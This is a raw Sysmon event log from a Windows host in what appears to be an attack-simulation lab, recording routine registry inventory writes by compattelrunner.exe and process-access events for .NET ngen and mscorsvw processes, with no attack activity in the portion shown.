14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filecoauth.exe|11eeeb6793d3440c\LinkDate09/17/2018 17:44:21 13241300x800000000000000081145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filecoauth.exe|11eeeb6793d3440c\Publishermicrosoft corporation 13241300x800000000000000081144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filecoauth.exe|11eeeb6793d3440c\LowerCaseLongPathc:\users\administrator\appdata\local\microsoft\onedrive\18.151.0729.0013\filecoauth.exe 13241300x800000000000000081143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplication\0000ac2b164d991c1905149501b3a507eacf0000ffff\PublisherMicrosoft Corporation 10341000x800000000000000081142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.325{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000081141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainbootstrap.ex|e0e8217a85996769\BinProductVersion1.0.0.0 13241300x800000000000000081140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainbootstrap.ex|e0e8217a85996769\LinkDate03/12/2099 03:28:12 13241300x800000000000000081139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainbootstrap.ex|e0e8217a85996769\Publisher(Empty) 13241300x800000000000000081138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainbootstrap.ex|e0e8217a85996769\LowerCaseLongPathc:\programdata\microsoft\defaultpackmsi\mainbootstrap.exe 13241300x800000000000000081137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplication\000039d7dda64d42d52d47a8c1ef2de554f100000904\PublisherMicrosoft 10341000x800000000000000081136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.309{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.309{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000081134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\uninstallservice|b474e6e3b02d0a2f\BinProductVersion1.0.0.0 13241300x800000000000000081133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\uninstallservice|b474e6e3b02d0a2f\LinkDate12/02/2073 23:47:04 13241300x800000000000000081132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\uninstallservice|b474e6e3b02d0a2f\Publisher(Empty) 13241300x800000000000000081131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\uninstallservice|b474e6e3b02d0a2f\LowerCaseLongPathc:\program files (x86)\microsoft\microsoft search in bing\uninstallservice.exe 13241300x800000000000000081130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\removemsbextensi|93cc3e9226dd48dc\BinProductVersion1.0.0.0 13241300x800000000000000081129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\removemsbextensi|93cc3e9226dd48dc\LinkDate04/25/2077 17:19:24 13241300x800000000000000081128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\removemsbextensi|93cc3e9226dd48dc\Publisher(Empty) 13241300x800000000000000081127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\removemsbextensi|93cc3e9226dd48dc\LowerCaseLongPathc:\program files (x86)\microsoft\microsoft search in bing\removemsbextension.exe 13241300x800000000000000081126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\microsoftsearchi|c0ce89b6d5da1587\BinProductVersion1.0.0.0 13241300x800000000000000081125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\microsoftsearchi|c0ce89b6d5da1587\LinkDate09/17/2080 23:31:16 13241300x800000000000000081124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\microsoftsearchi|c0ce89b6d5da1587\Publisher(Empty) 13241300x800000000000000081123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\microsoftsearchi|c0ce89b6d5da1587\LowerCaseLongPathc:\program files (x86)\microsoft\microsoft search in bing\microsoftsearchinbing.exe 13241300x800000000000000081122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainextbootstrap|8c1cfa07cd2269e4\BinProductVersion1.0.0.0 13241300x800000000000000081121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainextbootstrap|8c1cfa07cd2269e4\LinkDate08/03/2044 21:14:45 13241300x800000000000000081120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainextbootstrap|8c1cfa07cd2269e4\Publisher(Empty) 13241300x800000000000000081119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\mainextbootstrap|8c1cfa07cd2269e4\LowerCaseLongPathc:\program files (x86)\microsoft\microsoft search in bing\mainextbootstrap.exe 13241300x800000000000000081118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\extensionnativeh|84dfb41629fd8d14\BinProductVersion1.0.0.0 13241300x800000000000000081117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\extensionnativeh|84dfb41629fd8d14\LinkDate03/16/2053 06:17:47 13241300x800000000000000081116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\extensionnativeh|84dfb41629fd8d14\Publisher(Empty) 13241300x800000000000000081115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\extensionnativeh|84dfb41629fd8d14\LowerCaseLongPathc:\program files (x86)\microsoft\microsoft search in bing\extensionnativehost.exe 13241300x800000000000000081114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.309{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplication\0000e69baca32582bf26aefc45ba1980a48700000904\PublisherMicrosoft Corporation 13241300x800000000000000081113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.263{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\teams.exe|5aad1169f41a3221\BinProductVersion1.4.0.4167 13241300x800000000000000081112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.263{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\teams.exe|5aad1169f41a3221\LinkDate10/02/2020 12:48:24 13241300x800000000000000081111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.263{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\teams.exe|5aad1169f41a3221\Publishermicrosoft corporation 13241300x800000000000000081110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.263{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\teams.exe|5aad1169f41a3221\LowerCaseLongPathc:\program files (x86)\teams installer\teams.exe 13241300x800000000000000081109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.263{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplication\00003358ecd1a8589893ada1ceb3c6daabf500000904\PublisherMicrosoft Corporation 10341000x800000000000000081108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.263{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2C0F-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.247{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2C0F-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.247{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2C0F-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.184{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2B0F-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.169{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2B0F-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.169{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2B0F-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.075{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2A0F-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.075{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2A0F-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.075{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2A0F-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30